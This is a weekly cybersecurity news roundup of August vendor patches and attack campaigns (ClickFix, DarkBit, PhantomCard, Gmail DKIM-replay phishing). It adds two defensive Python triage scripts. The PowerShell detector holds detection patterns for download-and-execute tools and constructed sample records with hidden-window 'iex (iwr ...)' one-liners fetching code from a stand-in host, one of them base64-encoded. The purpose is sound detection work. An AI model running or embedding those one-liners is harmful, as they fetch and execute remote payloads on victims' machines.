This week's cybersecurity landscape was shaped by significant vendor patches and intensifying attacks. Below is a summary of the key developments.

Highlights of the Week
- Microsoft released its August Patch Tuesday on August 12, fixing 107 security flaws, among them critical remote code execution vulnerabilities in Windows, Office and Hyper-V.
- Cisco issued emergency advisories for vulnerabilities in IOS and NX-OS, some of which allow denial-of-service attacks against network infrastructure. The company also warned of growing supply chain threats after a breach attempt against telecom firms that relied on compromised Cisco equipment.
- Fortinet pushed updates for FortiGate firewalls to address critical buffer overflow issues that could give ransomware operators an initial foothold.
- The most notable attack of the week was a large DDoS campaign against European financial institutions, likely state-sponsored, that disrupted services across the region.
- Ransomware groups, LockBit among them, continued to exploit unpatched systems, particularly in health care.
- Security experts warned of AI-assisted attacks and urged organizations to double down on patching, threat intelligence and proactive defense.
Cyber Attacks
- ClickFix Trick Exploits Windows
Threat actors are using a technique dubbed "ClickFix": phishing pages and fake error or CAPTCHA prompts instruct the user to paste a command into the Windows Run dialog or a terminal, so the victim launches PowerShell themselves. The command fetches and runs a payload such as the Havoc post-exploitation framework, which establishes persistence and exfiltrates data over cloud services. Because the user initiates the execution, organizations should enable PowerShell script block logging, review it for hidden-window, encoded and download-and-execute one-liners, and train users never to paste commands offered by a web page.
- DarkBit Hits VMware ESXi Hosts
The DarkBit group is targeting VMware ESXi servers with custom ransomware that encrypts virtual machine disk files with AES-128-CBC and protects the file keys with RSA-2048. Decryption tools have since been released for affected victims, but administrators should still patch ESXi and monitor datastores for unusual activity such as VM files being renamed or rewritten in bulk.
- Attack on Canada's House of Commons
On August 9, attackers exploited a Microsoft vulnerability to gain access to Canada's House of Commons infrastructure and exfiltrated employee names, roles and email addresses. The Canadian Centre for Cyber Security is investigating; attribution has not been confirmed.
- New FireWood Backdoor Targets Linux
A new variant of the FireWood backdoor, associated with the Gelsemium APT group, is being deployed on Linux servers through web shells, giving the operators command execution and the ability to steal data. Administrators should scan web roots for web shell artifacts and restrict who can obtain a shell on those hosts.
- PhantomCard Android Malware Uses NFC for Theft
PhantomCard, a tool used by Brazilian cybercriminals, abuses NFC to relay a victim's payment card data to the attackers in real time. Delivered through fake security apps, it prompts the victim to hold their card against the phone and acts as a remote card reader for the attacker. Users should install only verified apps and disable NFC when it is not in use.
- Phishing via Microsoft Teams Remote Control
Attackers are abusing the remote-control feature of Teams meetings: during a call they request control of the victim's screen, and a victim who accepts hands over interactive access to the desktop. Organizations should disable the feature by meeting policy where it is not needed, or train users to decline control requests they did not initiate.
- Gmail Phishing Evades Filters
A sophisticated phishing campaign bypasses Gmail's defenses by reusing genuine Google security alerts: the attackers cause Google to send a notification containing their lure text and then forward it unchanged, so the message still carries a valid Google DKIM signature, while the embedded link leads to a credential-harvesting page hosted on sites.google.com. Recipients receive fake subpoenas or security notices. Users should check that the message is actually addressed to them, inspect the sender and envelope details, and treat links to sites.google.com in official-looking notices as suspect.
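The ClickFix item above recommends reviewing PowerShell logs for the paste-and-run pattern. The script below is an added example written for this roundup, not code from any vendor or from the campaign reports. It assumes each record combines the Sysmon Event 1 fields for a powershell.exe launch (CommandLine, ParentImage) with the Event 4104 script block text; the three records at the bottom are constructed, not real telemetry.

```python
"""Triage PowerShell execution records for ClickFix-style lures."""
import base64
import re

# ClickFix lures have the victim paste a one-liner into the Run dialog, so
# powershell.exe is a child of explorer.exe, the window is hidden, the payload
# is fetched from the web and run in memory, and the command often carries a
# fake "verification" comment to make the paste look legitimate.
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
EXEC_IN_MEMORY = re.compile(r"\b(iex|invoke-expression)\b", re.I)
WEB_FETCH = re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|"
                       r"invoke-restmethod|irm|curl|wget)\b", re.I)
FAKE_VERIFY = re.compile(r"not a robot|captcha|verification id", re.I)
ENCODED_CMD = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(command_line):
    """Append the decoded form of any -EncodedCommand payload (base64 of UTF-16LE)."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return command_line
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le", "ignore")
    except ValueError:
        return command_line
    return command_line + "\n" + decoded


def score_event(event):
    """Return the list of ClickFix indicators matched by one record."""
    text = expand_encoded(event["CommandLine"]) + "\n" + event.get("ScriptBlockText", "")
    hits = []
    if HIDDEN_WINDOW.search(text):
        hits.append("hidden_window")
    if EXEC_IN_MEMORY.search(text) and WEB_FETCH.search(text):
        hits.append("download_and_execute")
    if FAKE_VERIFY.search(text):
        hits.append("fake_verification_text")
    if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        hits.append("launched_from_explorer")  # Run dialog, but also the Start menu
    return hits


def triage(events, threshold=2):
    """Return (EventRecordID, indicators) for records with at least `threshold` hits."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((event["EventRecordID"], hits))
    return flagged


# Constructed sample records (assumed field names, not real telemetry).
_ENCODED_PAYLOAD = base64.b64encode(
    "iex (iwr http://example.invalid/b.txt -UseBasicParsing)".encode("utf-16-le")).decode()
CONSTRUCTED_EVENTS = [
    {"EventRecordID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/a.txt -UseBasicParsing)" '
                    '# I am not a robot - reCAPTCHA Verification ID: 4318',
     "ScriptBlockText": "iex (iwr http://example.invalid/a.txt -UseBasicParsing)"},
    {"EventRecordID": 2, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -nop -w hidden -enc " + _ENCODED_PAYLOAD,
     "ScriptBlockText": ""},
    {"EventRecordID": 3, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\Scripts\rotate-logs.ps1",
     "ScriptBlockText": r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB | Remove-Item"},
]

if __name__ == "__main__":
    for record_id, hits in triage(CONSTRUCTED_EVENTS):
        print(record_id, hits)
```

The explorer.exe parent is deliberately a weak signal (any Start-menu launch has it), which is why the default threshold requires two indicators; the two lure records trip three or four, while the scheduled maintenance script trips none.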
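The Gmail item above describes a message that passes DKIM because it is a genuine Google notification forwarded unchanged. The following is an added example for this roundup, not code from Google or any mail vendor: a header-and-body triage that scores the signals a replayed notice leaves behind. It assumes a mail gateway that records Delivered-To and Authentication-Results, and the two messages embedded below are constructed to mimic the campaign and a legitimate alert.

```python
"""Flag replayed, DKIM-valid Google notices used for phishing."""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Google domains that serve user-authored content (assumed list for this example).
USER_HOSTED_GOOGLE = {"sites.google.com", "docs.google.com", "drive.google.com", "script.google.com"}


def _domain(addr):
    """Domain part of an RFC 5322 address field, lower-cased ('' if absent)."""
    mailbox = parseaddr(addr)[1]
    return mailbox.rsplit("@", 1)[-1].lower() if "@" in mailbox else ""


def _is_google(domain):
    return domain == "google.com" or domain.endswith(".google.com")


def dkim_pass_domains(msg):
    """Signing domains reported as dkim=pass in Authentication-Results headers."""
    domains = set()
    for header in msg.get_all("Authentication-Results", []):
        for m in re.finditer(r"dkim=pass[^;]*?header\.[id]=@?([\w.-]+)", header):
            domains.add(m.group(1).lower())
    return domains


def links(msg):
    if msg.is_multipart():
        return []
    return URL_RE.findall(msg.get_payload(decode=True).decode("utf-8", "ignore"))


def triage_message(raw):
    """Return the replay-phishing indicators found in one raw message."""
    msg = message_from_string(raw)
    findings = []
    # 1. Signed by Google (so DKIM and DMARC pass) and From: is Google, yet the
    #    envelope sender that delivered it is another domain: a forward/replay.
    signed_by_google = any(_is_google(d) for d in dkim_pass_domains(msg))
    return_path = _domain(msg.get("Return-Path", ""))
    if signed_by_google and _is_google(_domain(msg.get("From", ""))) \
            and return_path and not _is_google(return_path):
        findings.append("signed_by_google_but_relayed")
    # 2. The mailbox it landed in is not the one the notice was addressed to,
    #    which is what the attacker's forwarded original looks like.
    delivered_to = parseaddr(msg.get("Delivered-To", ""))[1].lower()
    to_addr = parseaddr(msg.get("To", ""))[1].lower()
    if delivered_to and to_addr and delivered_to != to_addr:
        findings.append("to_header_mismatch")
    # 3. A "Google" notice whose link points at user-hosted Google content.
    if any((urlparse(u).hostname or "") in USER_HOSTED_GOOGLE for u in links(msg)):
        findings.append("user_hosted_google_link")
    return findings


# Constructed replayed notice (not a real message): the attacker's relay
# address is in To:, the victim is only in Delivered-To.
CONSTRUCTED_REPLAY = """\
Delivered-To: victim@example.invalid
Authentication-Results: mx.example.invalid; dkim=pass header.i=@accounts.google.com header.s=20230601; spf=pass smtp.mailfrom=privateemail.invalid
Return-Path: <relay@privateemail.invalid>
From: Google <no-reply@accounts.google.com>
To: me@forwarder.invalid
Subject: Security alert
Content-Type: text/plain

A subpoena was served on Google LLC. Review the case materials at
https://sites.google.com/u/0/d/abc123/preview
"""

# Constructed legitimate alert for comparison.
CONSTRUCTED_BENIGN = """\
Delivered-To: victim@example.invalid
Authentication-Results: mx.example.invalid; dkim=pass header.i=@accounts.google.com header.s=20230601; spf=pass smtp.mailfrom=accounts.google.com
Return-Path: <3abc@accounts.google.com>
From: Google <no-reply@accounts.google.com>
To: victim@example.invalid
Subject: Security alert
Content-Type: text/plain

A new sign-in on Windows. Check recent activity at
https://myaccount.google.com/notifications
"""

if __name__ == "__main__":
    print(triage_message(CONSTRUCTED_REPLAY))
    print(triage_message(CONSTRUCTED_BENIGN))
```

The first two indicators also fire on legitimate mailing-list or mailbox forwards, so treat them as a score to combine with the link check rather than a verdict on their own.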
Vulnerabilities Disclosed
- Ivanti Connect Secure / Policy Secure / ZTA
Four issues were patched, including two high-severity buffer overflow vulnerabilities (CVE-2025-5456 and CVE-2025-5462). The remaining fixes address an XML external entity (XXE) injection flaw and mishandling of symbolic links. Ivanti's cloud-hosted deployments receive the update automatically; on-premises installations must be patched manually.
- SAP August Security Release
SAP addressed 15 vulnerabilities, three of them critical code injection flaws (CVE-2025-42957, CVE-2025-42950 and CVE-2025-27429) in S/4HANA and SAP Landscape Transformation. Other fixes covered authorization bypass, cross-site scripting and path traversal issues in NetWeaver and Business One. Prioritize business-critical and internet-facing SAP systems when scheduling the updates.
- Microsoft August Patch – 107 Fixes
Microsoft's update fixes 107 vulnerabilities, including 36 remote code execution flaws (10 of them critical) in components such as Windows Graphics, Office, Excel and Hyper-V. Elevation-of-privilege issues (40 in total) also feature prominently, alongside spoofing, denial-of-service and information disclosure flaws. Microsoft reported none of them as exploited in the wild at release, but prompt patching is still recommended.
- FortiSIEM OS Command-Injection (CVE-2025-25256)
A critical flaw in Fortinet's FortiSIEM allows remote, unauthenticated command execution. Affected versions span 5.4 through 7.3, and proof-of-concept exploit code is already circulating. Upgrade immediately; as an interim mitigation, restrict access to the phMonitor service on TCP port 7900 to trusted hosts only.
- Rooted Android Full Control Vulnerability
A newly disclosed vulnerability affects rooted Android devices and could give an attacker full control of the device and access to its data. Because rooting removes the platform's own protections, users should reconsider whether rooting is worth the exposure and harden any device that must stay rooted.
- Cisco Secure Client / Secure Firewall DLL Hijacking
In versions up to 5.1.7.80, an authenticated local attacker can hijack a DLL through weak validation in an inter-process communication channel and run arbitrary code with SYSTEM privileges. The fix ships in version 5.1.8.1.
- Snort 3 Detection Weakness
Vulnerabilities reported in Snort 3 may allow attackers to evade detection, and one is also reported to allow privilege escalation. Apply the Snort 3 updates, including the vendor patches for any product that embeds the engine.
- Elastic EDR Zero Day
A reported zero-day in Elastic's EDR is said to bypass endpoint defenses, enabling malware execution and causing system crashes (BSOD). The finding was disclosed on August 17, 2025, and Elastic has publicly disputed it; organizations should track the vendor's response and apply any update it issues.